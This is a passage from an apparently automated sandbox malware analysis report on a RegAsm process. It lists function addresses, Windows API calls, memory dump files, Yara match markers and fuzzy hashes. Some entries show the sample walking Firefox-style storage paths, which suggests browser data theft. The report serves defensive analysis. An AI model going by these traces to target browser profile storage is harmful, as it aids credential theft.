                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • strtok_s.MSVCRT ref: 004116ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 539094379-0
                                                                                    • Opcode ID: 8b8f1fd3ae386cffe5c0d496de41a100932abcbb73e9faa806ea0b753c161961
                                                                                    • Instruction ID: e50a232fc8e2878604ceebe141ac7474a18635b4e39ef4b37662d16f24ae132a
                                                                                    • Opcode Fuzzy Hash: 8b8f1fd3ae386cffe5c0d496de41a100932abcbb73e9faa806ea0b753c161961
                                                                                    • Instruction Fuzzy Hash: 5A2106B1600505ABCB14DF95D981BEFB7A8EF04315F04423FE106E65A1DB78EA488A68
                                                                                    Function 6CC4B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4B4F5
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B502
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B542
                                                                                    • free.MOZGLUE(?), ref: 6CC4B578
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                                    • Instruction ID: 48c1169dc9ce747b403f9707add61b2856b8b85d96a47c8c9b00becc81d606ce
                                                                                    • Opcode Fuzzy Hash: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                                    • Instruction Fuzzy Hash: 0A11AC38A04B45CBD7128FA9C410769F3B0FF9A318F10D70AE84952B02FBB4B5D48A94
                                                                                    Function 00419049 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction ID: 6c12d003c91e958138eed580c0154e496b93e037388a0c8d124b30f15893669d
                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction Fuzzy Hash: 1911403644014AFBCF225E95CC11CEE3F62BB1C354B58845AFE2959131D73AC9B2AB89
                                                                                    Function 6CC73DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC3F20E,?), ref: 6CC73DF5
                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC3F20E,00000000,?), ref: 6CC73DFC
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC73E06
                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC73E0E
                                                                                      • Part of subcall function 6CC6CC00: GetCurrentProcess.KERNEL32(?,?,6CC331A7), ref: 6CC6CC0D
                                                                                      • Part of subcall function 6CC6CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC331A7), ref: 6CC6CC16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                    • String ID:
                                                                                    • API String ID: 2787204188-0
                                                                                    • Opcode ID: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                                    • Instruction ID: 9d300804ed67bedd48821102e6da071106251510fa49828224085e15a2096ba1
                                                                                    • Opcode Fuzzy Hash: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                                    • Instruction Fuzzy Hash: 66F01275A002087FDB00AB94DC85DAB377DDB46628F040024FD0857741E636BD2586FB
                                                                                    Function 0040FA9C Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                    • lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 809291720-0
                                                                                    • Opcode ID: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                    • Instruction ID: 38bc537ac666268100f5265c1d729237def4eef846b7224f466c0159986bfced
                                                                                    • Opcode Fuzzy Hash: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                    • Instruction Fuzzy Hash: 90015AB6900215EFDB209F99D88499AFBF5FF48314B10883EE999E3610C775A944CF50
                                                                                    Function 0040FC38 Relevance: 6.0, APIs: 4, Instructions: 33memorytimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                                    • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                                    • wsprintfA.USER32 ref: 0040FC84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1243822799-0
                                                                                    • Opcode ID: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                    • Instruction ID: 6a3b0a9d5a99a23c7b872276523f8019a9300f8a2912452fb95d56cdfabf1196
                                                                                    • Opcode Fuzzy Hash: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                    • Instruction Fuzzy Hash: F7F0FEAA900124BBDB50ABD99D09ABF76FDEF0DB02F001452FB41E1091E6788950D7B4
                                                                                    Function 6CC82050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8205B
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC82064
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8208E
                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC820A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                                    • Instruction ID: a7ba363ecef7fd4b7c1b29ec385ed93362742bc669c7128d3501e902d6065a11
                                                                                    • Opcode Fuzzy Hash: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                                    • Instruction Fuzzy Hash: E7F0B4B1201A109BC7118F16D89C75BBBF9EF86328F10012AF50687710DBB5B806CB99
                                                                                    Function 6CC820B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC820B7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820C0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820DA
                                                                                    • free.MOZGLUE(00000000,?,6CC6FBD1), ref: 6CC820F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                                    • Instruction ID: 76e149e102248059f2c16f70d5a8d1039b48b1e54a8c2708622b9a547cfe41a2
                                                                                    • Opcode Fuzzy Hash: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                                    • Instruction Fuzzy Hash: 1CE0E5756016148BC6209F65985C54FBBF9FF86318B10022AF446C3B00E775B94686D9
                                                                                    Function 0040AFAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A981: _EH_prolog.MSVCRT ref: 0040A986
                                                                                      • Part of subcall function 0040A981: wsprintfA.USER32 ref: 0040A9AF
                                                                                      • Part of subcall function 0040A981: FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                      • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425E8C), ref: 0040A9E3
                                                                                      • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425E90), ref: 0040A9FD
                                                                                      • Part of subcall function 0040A981: lstrlenA.KERNEL32(00000000,00425BD2,00000000,?,?,?,00425E94,?,?,00425BCF), ref: 0040AAAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                    • String ID: .metadata-v2$\storage\default\
                                                                                    • API String ID: 2418158533-762053450
                                                                                    • Opcode ID: 436458fe6c3eab354495f11facbcc44a1275279d5afbea107d196bf00171687c
                                                                                    • Instruction ID: a14787033ca920f59e392be47905aa310ec2001b976b3b6e2cbc28ff02bc3610
                                                                                    • Opcode Fuzzy Hash: 436458fe6c3eab354495f11facbcc44a1275279d5afbea107d196bf00171687c
                                                                                    • Instruction Fuzzy Hash: 0B614B70905288EACB04EBE5D556BDDBBB4AF19308F5041BEE805736C2DB781B0CCB66
                                                                                    Function 6CC885B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC885D3
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC88725
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 3720097785-1285458680
                                                                                    • Opcode ID: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                                    • Instruction ID: 2140abc75b77bfd605806b1b4853986fe4d67bedb3431fac5c25acb84d06685e
                                                                                    • Opcode Fuzzy Hash: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                                    • Instruction Fuzzy Hash: 285164B4602641CFD701CF18C184A5ABBF1BF4A318F18C29AD8595BB66E335E885CF92
                                                                                    Function 6CC3BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BDEB
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BE8F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                    • String ID: 0
                                                                                    • API String ID: 2811501404-4108050209
                                                                                    • Opcode ID: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                                    • Instruction ID: dc0f8432bd8d73194d30666967e99beefccc4b790f38438710aa6e3bf2a419d4
                                                                                    • Opcode Fuzzy Hash: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                                    • Instruction Fuzzy Hash: E541D271908B55CFC301CF39D4A1A9BB7F4BF8A348F006A5DF989A7651E730D9498B82
                                                                                    Function 0040E048 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040E062
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                      • Part of subcall function 0040DE51: std::_Xinvalid_argument.LIBCPMT ref: 0040DE62
                                                                                    • memcpy.MSVCRT ref: 0040E0BD
                                                                                    Strings
                                                                                    • invalid string position, xrefs: 0040E05D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                    • String ID: invalid string position
                                                                                    • API String ID: 214693668-1799206989
                                                                                    • Opcode ID: c4fbb52194d514d2383de81ebaf390774be77460390ae227aae215045b61bd7a
                                                                                    • Instruction ID: fb13f81e348a68403f605101857dbbe0ac2b7e8c850512d56fa6c098faf2f30f
                                                                                    • Opcode Fuzzy Hash: c4fbb52194d514d2383de81ebaf390774be77460390ae227aae215045b61bd7a
                                                                                    • Instruction Fuzzy Hash: C6112B31308224DBDB249E1A9C41A26B3A5EB95714F100D3FF852AB3C1D7F9D850C79E
                                                                                    Function 0040DFAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
